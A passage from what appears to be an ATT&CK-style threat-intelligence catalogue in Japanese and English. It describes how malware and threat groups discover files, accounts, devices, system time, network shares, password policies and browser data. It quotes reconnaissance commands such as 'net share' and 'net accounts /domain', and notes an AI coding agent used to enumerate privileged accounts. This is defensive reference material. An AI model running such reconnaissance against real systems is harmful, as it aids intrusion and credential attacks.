shares. WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files. NotPetya searches for files ending with dozens of different file extensions prior to encryption. Remexi searches for files on the system. HOPLIGHT has been observed enumerating system drives and partitions. PoshC2 can enumerate files on the local file system and includes a module for enumerating recently accessed files. njRAT can browse file systems using a file manager module. KeyBoy has a command to launch a file browser or explorer on the system. OSX/Shlayer has used the command <code>appDir="$(dirname $(dirname "$currentDir"))"</code> and <code>$(dirname "$(pwd -P)")</code> to construct installation paths. Machete produces file listings in order to search for files to be exfiltrated. Fysbis has the ability to search for files. ZxShell has a command to open a file manager and explorer on the system. BabyShark has used <code>dir</code> to search for "programfiles" and "appdata". PoetRAT has the ability to list files upon receiving the <code>ls</code> command from C2. HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types. Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there. PLEAD has the ability to list drives and files on the compromised host. TSCookie has the ability to discover drive information on the infected host. Kivars has the ability to list drives on the infected host. Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files. Okrum has used DriveLetterView to enumerate drive information. MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds. ShimRat can list directories. Ryuk has enumerated files and folders on all mounted drives. Lokibot can search for specific files on an infected host. Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files. USBferry can detect the victim's file or folder list. Metamorfo has searched the Program Files directories for specific folders and has searched for strings related to its mutexes. Aria-body has the ability to gather metadata from a file and to search for file and directory names. Ramsay can collect directory and file lists. SDBbot has the ability to get directory listings or drive information on a compromised host. WindTail has the ability to enumerate the users home directory and the path to its own application bundle. TajMahal has the ability to index files from drives, user profiles, and removable drives. Skidmap has checked for the existence of specific files including <code>/usr/sbin/setenforce</code> and <code> /etc/selinux/config</code>. It also has the ability to monitor the cryptocurrency miner file and process. down_new has the ability to list the directories on a compromised host. Avenger has the ability to browse files in directories such as Program Files and the Desktop. BackConfig has the ability to identify folders and files related to previous infections. CrackMapExec can discover specified filetypes and log files on a targeted system. StrongPity can parse the hard drive on a compromised host to identify specific file extensions. CookieMiner has looked for files in the user's home directory with "wallet" in their name using <code>find</code>. GoldenSpy has included a program "ExeProtector", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary. REvil has the ability to identify specific files and directories that are not to be encrypted. Dacls can scan directories on a compromised host. Cryptoistic can scan a directory to identify files for deletion. FatDuke can enumerate directories on target machines. SoreFang has the ability to list directories. BLINDINGCAN can search, read, write, move, and execute files. KGH_SPY can enumerate files and directories on a compromised host. SLOTHFULMEDIA can enumerate files and directories. Bazar can enumerate the victim's desktop. DropBook can collect the names of all files and folders in the Program Files directories. SUNBURST had commands to enumerate files and directories. SUNSPOT enumerated the Orion software Visual Studio solution directory path. BlackMould has the ability to find files on the targeted system. Dtrack can list files on available disk volumes. Caterpillar WebShell can search for files in directories. Conti can discover files on a local system. MegaCortex can parse the available drives and directories to determine which files to encrypt. LookBack can retrieve file listings from the victim machine. TAINTEDSCRIBE can use <code>DirectoryList</code> to enumerate files in a specified directory. Penquin can use the command code <code>do_vslist</code> to send file names, size, and status to C2. RemoteUtilities can enumerate files and directories on a target machine. P.A.S. Webshell has the ability to list files and file characteristics including extension, size, ownership, and permissions. Kinsing has used the find command to search for specific files. Doki has resolved the path of a process PID to use as a script argument. Stuxnet uses a driver to scan for specific filesystem driver objects. Industroyer’s data wiper component enumerates specific files on all the Windows drives. KillDisk has used the <code>FindNextFile</code> command as part of its file deletion process. SideTwist has the ability to search for specific files. Clop has searched folders and subfolders for files to encrypt. WastedLocker can enumerate files and directories just prior to encryption. SombRAT can execute <code>enum</code> to enumerate files in storage on a compromised system. DEATHRANSOM can use loop operations to enumerate directories on a compromised host. FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions. AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories. Siloscape searches for the Kubernetes config file and other related files using a regular expression. Cuba can enumerate files by using a variety of functions. FYAnti can search the <code>C:\Windows\Microsoft.NET\</code> directory for files of a specified size. RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions. Nebulae can list files and directories on a compromised host. GrimAgent has the ability to enumerate files and directories on a compromised host. Sliver can enumerate files on a target system. BoomBox can search for specific files and directories on a machine. Babuk has the ability to enumerate files on a targeted system. Avaddon has searched for specific files prior to encryption. BADFLICK has searched for files on the infected host. Peppy can identify specific files for exfiltration. ObliqueRAT has the ability to recursively enumerate files on an infected endpoint. Turian can search for specific files and list directories. QakBot can identify whether it has been run previously on a host by checking for a specified folder. BoxCaon has searched for files on the system, such as documents located in the desktop folder. MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb. BLUELIGHT can enumerate files and collect associated metadata. XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions and leverages a module to run the command `ls -la ~/Desktop`. Diavol has a command to traverse the files and directories in a given path. Clambling can browse directories on a compromised host. FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server. SysUpdate can search files on a compromised host. ThreatNeedle can obtain file and directory information. Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization/Sandbox Evasion. WarzoneRAT can enumerate directories on a compromise host. Zox can enumerate files on a compromised host. DarkWatchman has the ability to enumerate file and folder names. CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer. QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z. Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory. WhisperGate can locate files based on hardcoded file extensions. SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files. CaddyWiper can enumerate all files and directories on a compromised host. HermeticWiper can enumerate common folders such as My Documents, Desktop, and AppData. MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders. OutSteel can search for specific file extensions, including zipped files. Saint Bot can search a compromised host for specific files. The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size. CreepyDrive can specify the local file path to upload files from. Amadey has searched for folders associated with antivirus software. Heyoka Backdoor has the ability to search the compromised host for files. Action RAT has the ability to collect drive and file information on an infected machine. PingPull can enumerate storage volumes and folder contents of a compromised host. StrifeWater can enumerate files on a compromised host. Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands. SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name. ccf32 can parse collected files to identify specific file extensions. FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection. AvosLocker has searched for files and directories on a compromised network. Prestige can traverse the file system to discover files to encrypt by identifying specific extensions defined in a hardcoded list. metaMain can recursively enumerate files in an operator-provided directory. Mafalda can search for files and directories. Woody RAT can list all files and their associated attributes, including filename, type, owner, creation time, last access time, last write time, size, and permissions. BlackCat can enumerate files for encryption. Black Basta can enumerate specific files for encryption. Royal can identify specific files and directories to exclude from the encryption process. SharpDisco can identify recently opened files by using an LNK format parser to extract the original file path from LNK files found in either `%USERPROFILE%\Recent` (Windows XP) or `%APPDATA%\Microsoft\Windows\Recent` (newer Windows versions) . NightClub can use a file monitor to identify .lnk, .doc, .docx, .xls, .xslx, and .pdf files. Cheerscrypt can search for log and VMware-related files with .log, .vmdk, .vmem, .vswp, and .vmsn extensions. Samurai can use a specific module for file enumeration. Ninja has the ability to enumerate directory content. LoFiSe can monitor the file system to identify files less than 6.4 MB in size with file extensions including .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .odt, .ods, .odp, .eml, and .msg. Pcexter has the ability to search for files in specified directories. COATHANGER will survey the contents of system files during installation. PACEMAKER can parse `/proc/"process_name"/cmdline` to look for the string `dswsd` within the command line. Some versions of DarkGate search for the hard-coded folder <code>C:\Program Files\e Carte Bleue</code>. ZIPLINE can find and append specific files on Ivanti Connect Secure VPNs based upon received commands. LITTLELAMB.WOOLTEA can monitor for system upgrade events by checking for the presence of `/tmp/data/root/dev`. Mispadu searches for various filesystem paths to determine what banking applications are installed on the victim’s machine. AcidRain identifies specific files and directories in the Linux operating system associated with storage devices. Akira examines files prior to encryption to determine if they meet requirements for encryption and can be encrypted by the ransomware. These checks are performed through native Windows functions such as <code>GetFileAttributesW</code>. Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check. MultiLayer Wiper generates a list of all files and paths on the fixed drives of an infected system, enumerating all files on the system except specific folders defined in a hardcoded list. INC Ransomware can receive command line arguments to encrypt specific files and directories. Spica can list filesystem contents on targeted systems. LunarWeb has the ability to retrieve directory listings. LunarMail can search its staging directory for output files it has produced. Raccoon Stealer identifies target files and directories for collection based on a configuration file. CHIMNEYSWEEP has the ability to enumerate directories for files that match a set list. ROADSWEEP can enumerate files on infected devices and avoid encrypting files with .exe, .dll, .sys, .lnk, or . lck extensions. Cuckoo Stealer can search for files associated with specific applications. Manjusaka can gather information about specific files on the victim system. DUSTTRAP can enumerate files and directories. Latrodectus can collect desktop filenames. Playcrypt can avoid encrypting files with a .PLAY, .exe, .msi, .dll, .lnk, or .sys file extension. AcidPour can identify specific files and directories within the Linux operating system corresponding with storage devices for follow-on wiping activity, similar to AcidRain. Mango can enumerate the contents of current working or other specified directories. ODAgent can identify the current working directory. Exbyte enumerates all document files on an infected machine, then creates a summary of these items including filename and directory location prior to exfiltration to cloud hosting services. BOLDMOVE can list information of all files in the system recursively from the root directory or from a specified directory. LightSpy uses the `NSFileManager` to move, create and delete files. LightSpy can also use the assembly `bt` instruction to determine a file's executable permissions. Megazord can ignore specified directories for encryption. Akira _v2 can target specific files and folders for encryption. Troll Stealer can enumerate and collect items from local drives and folders. Gomir collects information about directory and file structures, including total number of subdirectories, total number of files, and total size of files on infected systems. LockBit 2.0 can exclude files associated with core system functions from encryption. StealBit can be configured to exfiltrate specific file types. LockBit 3.0 can exclude files associated with core system functions from encryption. RansomHub has the ability to only encrypt specific files. The Havoc interface can display a file explorer view of the compromised host. SplatCloak has used Windows API to identify files associated with Windows Defender and Kaspersky. Qilin can exclude specific directories and files from encryption. Medusa Ransomware has searched for files within the victim environment for encryption and exfiltration. Medusa Ransomware has also identified files associated with remote management services. InvisibleFerret has identified specific directories and files for exfiltration using the `ssh_upload` command which contains subcommands of `.sdira`, `sdir`, `sfile`, `sfinda`, `sfindr`, `sfind`. InvisibleFerret also has the capability to scan and upload files of interest from multiple OS systems through the use of scripts that check file names, file extensions, and avoids certain path names. InvisibleFerret has utilized the `findstr` on Windows or the macOS `find` commands to search for files of interest. BeaverTail has searched for .ldb and .log files stored in browser extension directories for collection and exfiltration. Embargo has searched for folders, subfolders and other networked or mounted drives for follow on encryption actions. Embargo has also iterated device volumes using `FindFirstVolumeW()` and `FindNextVolumeW()` functions and then calls the `GetVolumePathNamesForVolumeNameW()` function to retrieve a list of drive letters and mounted folder paths for each specified volume. If executed with elevated privileges, Diskpart can list all volumes, including virtual disks. TruffleHog has can browse and scan individual files and directories. BRICKSTORM has identified specific files and directories within targeted hosts and systems for modification, execution, collection and exfiltration. LODEINFO has the ability to designate specific files and folders to encryption. ANELLDR can enumerate files in the current directory to search for encrypted payload files. SameCoin can list all system files and can avoid wiping specific directories such as Program Files, Windows, and Users. The AshTag AshenOrchestrator component can enumerate files on victim hosts. LAMEHUG can target directories on victim machines for file collection. DynoWiper has used the Microsoft Windows native `FindFirstFile()` and `FindNextFile()` to recursively enumerate directories and files on the system. LazyWiper can specifically target multiple files by extension including: .rar, .tar.gz, .zip, .7z, .json, .bcp, .bak, .gho, .erf, .edb, .onepkg, .pst, and .ldiff. 敵対者は、アカウント（ローカル/ドメイン/メール/クラウド）を列挙することがある。 Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts). 敵対者は、ローカルアカウントを列挙して環境を把握することがある。Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. 敵対者は、ドメインアカウントを列挙して環境を把握することがある。Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. 敵対者は、メールアカウント（アドレス帳等）を列挙することがある。Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). 敵対者は、クラウドアカウントを列挙して環境を把握することがある。Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. アカウントの作成・権限・ライフサイクルを適切に管理する。 OSを安全に構成し、攻撃対象領域を縮小する。 アカウントの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 obtained a list of users and their roles from an Exchange server using `Get-ManagementRoleAssignment`. During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to query internal database user account tables to enumerate accounts and identify high-privilege accounts within compromised environments. Aquatic Panda used the <code>last</code> command in Linux environments to identify recently logged-in users on victim machines. Scattered Spider has identified vSphere administrator accounts. FIN13 has enumerated all users and their roles from a victim's main treasury system. ShimRatReporter listed all non-privileged and privileged accounts available on the machine. XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data. Woody RAT can identify administrator accounts on an infected machine. Havoc can identify privileged user accounts on infected systems. TONESHELL included functionality to retrieve a list of user accounts. 敵対者は、接続された周辺デバイスを探索することがある。 Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. 周辺デバイスの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation CuckooBees, the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance. During Operation Wocao, threat actors discovered removable disks attached to a system. APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim. Turla has used <code>fsutil fsinfo drives</code> to list connected drives. Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware. Gamaredon Group tools have contained an application to check performance of USB flash drives. Gamaredon Group has also used malware to scan for removable drives. OilRig has used tools to identify if a mouse is connected to a targeted system. APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices. BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives. TeamTNT has searched for attached VGA devices using lspci. Volt Typhoon has obtained victim's screen dimension and display device information. PlugX can identify removable media attached to compromised hosts. ADVSTORESHELL can list connected devices. DustySky can detect connected USB devices. BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry. T9000 searches through connected drives for removable storage devices. A module in Prikormka collects information on available printers and disk drives. Crimson has the ability to discover pluggable/removable drives to extract files from. BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message. USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system. RTM can obtain a list of smart card readers attached to the victim. MoonWind obtains the number of removable drives from the victim. Bandook can detect USB devices. Zebrocy enumerates information about connected storage devices. jRAT can map UPnP ports. WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device. FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader. njRAT will attempt to detect if the victim system has a camera during the initial infection. njRAT can also detect any removable drives connected to the system. Machete detects the insertion of new devices by listening for the WM_DEVICECHANGE window message. Attor has a plugin that collects information about inserted storage devices, modems, and phone devices. USBferry can check for connected USB devices. Cadelspy has the ability to steal information about printers and the documents sent to printers. Ramsay can scan for removable media which may contain documents for collection. TajMahal has the ability to identify connected Apple devices. Ragnar Locker may attempt to connect to removable drives and mapped network drives. Crutch can monitor for removable drives being plugged into the compromised machine. Stuxnet enumerates removable drives for infection. WastedLocker can enumerate removable drives prior to the encryption process. ObliqueRAT can discover pluggable/removable drives to extract files from. Turian can scan for removable media to collect data. QakBot can identify peripheral devices on targeted systems. DarkWatchman can list signed PnP drivers for smartcard readers. Ferocious can run <code>GET.WORKSPACE</code> in Microsoft Excel to check if a mouse is present. QuietSieve can identify and search removable drives for specific file name extensions. Mongall can identify removable media attached to compromised hosts. Heyoka Backdoor can identify removable media attached to victim's machines. The FunnyDream FilepakMonitor component can detect removable drive insertion. SVCReady can check for the number of devices plugged into an infected host. SharpDisco has dropped a plugin to monitor external drives to `C:\Users\Public\It3.exe`. NightClub has the ability to monitor removable drives. INC Ransomware can identify external USB and hard drives for encryption and printers to print ransom notes. CHIMNEYSWEEP can monitor for removable drives. ROADSWEEP can identify removable drives attached to the victim's machine. AcidPour includes functionality to identify MMC and SD cards connected to the victim device. LockBit 2.0 has the ability to identify mounted external storage devices. LockBit 3.0 has the ability to discover external storage devices. HIUPAN has checked periodically for removable drives and installs itself when a drive is detected. DynoWiper has enumerated and overwritten files on all removeable and fixed drives. 敵対者は、システムの時刻やタイムゾーンを探索することがある。 An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS. These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain. システム時刻の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance. During Operation Wocao, threat actors used the `time` command to retrieve the current time of a compromised system. During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network. Turla surveys a system upon check-in to discover the system time by using the <code>net time</code> command. Darkhotel malware can obtain system time from a compromised host. A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server. FIN7 has used the PowerShell script 3CF9.ps1 to execute `net time`. BRONZE BUTLER has used <code>net time</code> to check the local time on a target system. The White Company has checked the current date on the victim system. Kimsuky has gathered the system time of the device using the PowerShell cmdlet `Get-Date`. Chimera has used <code>time /t</code> and <code>net time \\ip/hostname</code> for system time discovery. Sidewinder has used tools to obtain the current system time. Higaisa used a function to gather the current time. ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2. CURIUM deployed mechanisms to check system time information following strategic website compromise attacks. Volt Typhoon has obtained the victim's system timezone. UNC3886 has used installation scripts to collect the system time on targeted ESXi hosts. Taidoor can use <code>GetLocalTime</code> and <code>GetSystemTime</code> to collect system time. PlugX has identified system time through its GetSystemInfo command. BISCUIT has a command to collect the system `UPTIME`. The <code>net time</code> command can be used in Net to determine the local or remote system time. Epic uses the <code>net time</code> command to get the system time from the machine and collect the current date and time zone information. T9000 gathers and beacons the system time during installation. Crimson has the ability to determine the date and time on a compromised host. ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday). PowerDuke has commands to get the time the machine was built, the time, and the time zone. Shamoon obtains the system time and will only activate if it is greater than a preset date. RTM can obtain the victim time zone. MoonWind obtains the victim's current time. GravityRAT can obtain the date and time of a system. As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server. Zebrocy gathers the current time zone and date information from the system. InvisiMole gathers the local system time from the victim’s machine. OopsIE checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone. FELIXROOT gathers the time zone information from the victim’s machine. Bisonal can check the system time set on the infected host. UPPERCUT has the capability to obtain the time zone information and the current timestamp of the victim’s machine. Zeus Panda collects the current system time (UTC) and sends it back to the C2 server. Agent Tesla can collect the timestamp from the victim’s machine. Carbon uses the command <code>net time \\127.0.0.1</code> to get information the system’s time. Azorult can collect the time zone information from the system. Cannon can collect the current time zone information from the victim’s machine. NOKKI can collect the current timestamp of the victim's machine. Astaroth collects the timestamp from the infected machine. HOPLIGHT has been observed collecting system time from victim machines. StoneDrill can obtain the current date and time of the victim machine. EvilBunny has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox. GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system. Okrum can obtain the date and time of the compromised system. SHARPSTATS has the ability to identify the current date and time on the compromised host. Metamorfo uses JavaScript to get the system time. WindTail has the ability to generate the current date and time. TajMahal has the ability to determine local time on a compromised host. build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active. PipeMon can send time zone information from a compromised host to C2. Grandoreiro can determine the time on the victim machine via IPinfo. Bazar can collect the time on the compromised host. Egregor contains functionality to query the local/system time. SUNBURST collected device `UPTIME`. BendyBear has the ability to determine local time on a compromised host. TAINTEDSCRIBE can execute <code>GetLocalTime</code> for time discovery. GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server. ShadowPad has collected the current date and time of the victim system. Stuxnet collects the time and date of a system when it is infected. Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date. SombRAT can execute <code>getinfo</code> to discover the current time on a compromised host. AppleSeed can pull a timestamp from the victim's machine. QakBot can identify the system time on a targeted host. BLUELIGHT can collect the local time on a compromised host. Clambling can determine the current time. DarkWatchman can collect time zone information and system `UPTIME`. Torisma can collect the current time on a victim machine. Green Lambert can collect the date and time from a compromised host. SILENTTRINITY can collect start time information from a compromised host. DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time. DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process. StrifeWater can collect the time zone from the victim's machine. ccf32 can determine the local time on targeted machines. FunnyDream can check system time to help determine when changes were made to specified files. KEYPLUG can obtain the current tick count of an infected computer. AvosLocker has checked the system time before and after encryption. SVCReady can collect time zone information. BADHATCH can obtain the `DATETIME` and `UPTIME` from a compromised machine. AsyncRAT can check whether the current system hour and day of the week are within operating hours defined it its configuration. DarkGate creates a log file for capturing keylogging, clipboard, and related data using the victim host's current date for the filename. DarkGate queries victim system epoch time during execution. DarkGate captures system time information as part of automated profiling on initial installation. DEADWOOD will set a timestamp value to determine when wiping functionality starts. When the timestamp is met on the system, a trigger file is created on the operating system allowing for execution to proceed. If the timestamp is in the past, the wiper will execute immediately. Nightdoor can identify the system local time information. Raccoon Stealer gathers victim machine timezone information. DUSTTRAP reads the infected system's current time and writes it to a log file during execution. ShrinkLocker retrieves a system timestamp that is used in generating an encryption key. StarProxy has utilized the windows API call `GetLocalTime()` to retrieve a SystemTime structure to generate a seed value. PUBLOAD has collected the machine’s tick count through the use of `GetTickCount`. PAKLOG has collected a timestamp to log the precise time a key was pressed, formatted as %Y-%m-%d %H:%M:%S. Medusa Ransomware has discovered device uptime through `GetTickCount()`. BeaverTail has obtained and sent the current timestamp associated with the victim device to C2. SystemBC has leveraged the time of the device to create a text file with a filename that uses the function of `uniqid(time()).‘.txt`, consisting of the 10 character UNIX timestamp and 13 hexadecimal characters. GlassWorm has the ability to check the system’s time zone on the victim device. LODEINFO can capture system time to send to the C2. 敵対者は、ネットワーク共有を探索することがある。 Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. OSを安全に構成し、攻撃対象領域を縮小する。 ネットワーク共有の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance. During Operation Wocao, threat actors discovered network disks mounted to the system using netstat. During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares. Leviathan scanned and enumerated remote network shares in victim environments during Leviathan Australian Intrusions. APT1 listed connected network shares. Dragonfly has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. APT32 used the <code>net view</code> command to show all shares available, including the administrative shares such as <code>C$</code> and <code>ADMIN$</code>. Sowbug listed remote shared drives that were accessible from a victim. Tropic Trooper used <code>netview</code> to scan target systems for shared resources. APT38 has enumerated network shares on a compromised host. APT39 has used the post exploitation tool CrackMapExec to enumerate network shares. APT41 used the <code>net share</code> command as part of network reconnaissance. Wizard Spider has used the “net view” command to locate mapped network shares. DarkVishnya scanned the network for public shared folders. Chimera has used <code>net share</code> and <code>net view</code> to identify network shares of interest. Tonto Team has used tools such as NBTscan to enumerate network shares. FIN13 has executed net view commands for enumeration of open shares on compromised machines. INC Ransom has used Internet Explorer to view folders on other systems. BlackByte enumerated network shares on victim devices. Medusa Group has identified network shares using `cmd.exe /c net share`. PlugX has a module to enumerate network shares. The <code>net view \\remotesystem</code> and <code>net share</code> commands in Net can be used to find shared drives and directories on remote and local systems respectively. Cobalt Strike can query shared drives on the local system. OSInfo discovers shares on the network Pupy can list local and remote shared drives and folders over SMB. MURKYTOP has the capability to retrieve information about shares on remote hosts. Kwampirs collects a list of network shares with the command <code>net share</code>. Koadic can scan local network for open SMB. Zebrocy identifies network drives when they are added to victim systems. InvisiMole can gather network share information. TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API. Empire can find shared drives on the local system. Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares. Emotet has enumerated non-hidden network shares using `WNetEnumResourceW`. ShimRat can enumerate connected drives for infected host machines. Ramsay can scan for network drives which may contain documents for collection. IcedID has used the `net view /all` command to show available shares. CrackMapExec can enumerate the shared folders and associated permissions for a targeted network. Bazar can enumerate shared drives on the domain. BitPaymer can search for network shares on the domain or workgroup using <code>net view <host></code>. Conti can enumerate remote open SMB network shares using <code>NetShareEnum()</code>. Stuxnet enumerates the directories of a network resource. Bad Rabbit enumerates open SMB shares on internal victim networks. Clop can enumerate network shares. WastedLocker can identify network adjacent and accessible drives. DEATHRANSOM has the ability to use loop operations to enumerate network resources. HELLOKITTY has the ability to enumerate network resources. FIVEHANDS can enumerate network shares and mounted drives on a network. Cuba can discover shared resources using the <code>NetShareEnum</code> API call. Babuk has the ability to enumerate network shares. Avaddon has enumerated shared folders and mapped volumes. QakBot can use <code>net share</code> to identify network shares for use in lateral movement. Diavol has a `ENMDSKS` command to enumerates available network shares. Clambling has the ability to enumerate network shares. QuietSieve can identify and search networked drives for specific file name extensions. WhisperGate can enumerate connected remote logical drives. SILENTTRINITY can enumerate shares on a compromised host. Flagpro has been used to execute `net view` to discover mapped network shares. AvosLocker has enumerated shared drives on a compromised network. BlackCat has the ability to discover network shares on compromised networks. Royal can enumerate the shared resources of a given IP addresses using the API call `NetShareEnum`. KOPILUWAK can use netstat and Net to discover network shares. BADHATCH can check a user's access to the C$ share on a compromised machine. Sardonic has the ability to execute the `net view` command. Akira can identify remote file shares for encryption. INC Ransomware has the ability to check for shared network drives to encrypt. LunarWeb can identify shared resources in compromised environments. DUSTTRAP can identify and enumerate victim system network shares. Latrodectus can run `C:\Windows\System32\cmd.exe /c net view /all` to discover network shares. BlackByte Ransomware can identify network shares connected to the victim machine. BlackByte 2.0 Ransomware can identify network shares connected to the victim machine. LockBit 2.0 can discover remote shares. LockBit 3.0 can identify network shares on compromised systems. RansomHub has the ability to target specific network shares for encryption. Qilin has the ability to list network drives. Medusa Ransomware has identified networked drives. Embargo has searched for folders, subfolders and other networked or mounted drives for follow-on encryption actions. 敵対者は、パスワードポリシーを探索して総当たり戦略を調整することがある。 Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). 強固なパスワードポリシーを適用し、推測・解読を困難にする。 パスワードポリシーの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance. Turla has used <code>net accounts</code> and <code>net accounts /domain</code> to acquire password policy information. OilRig has used net.exe in a script with <code>net accounts /domain</code> to find the password policy of a domain. Chimera has used the NtdsAudit utility to collect information related to accounts and passwords. The <code>net accounts</code> and <code>net accounts /domain</code> commands with Net can be used to obtain password policy information. Kwampirs collects password policy information with the command <code>net accounts</code>. PoshC2 can use <code>Get-PassPol</code> to enumerate the domain password policy. CrackMapExec can discover the password policies applied to the target system. 敵対者は、ブラウザのブックマークや履歴等を探索することがある。 Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. ブラウザ情報の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Outer Space, OilRig used a Chrome data dumper named MKG. During Juicy Mix, OilRig used the CDumper (Chrome browser) and EDumper (Edge browser) data stealers to collect cookies, browsing history, and credentials. During the 3CX Supply Chain Attack, AppleJeus leveraged ICONICSTEALER to steal browser information to include browser history located on the infected host. During Operation 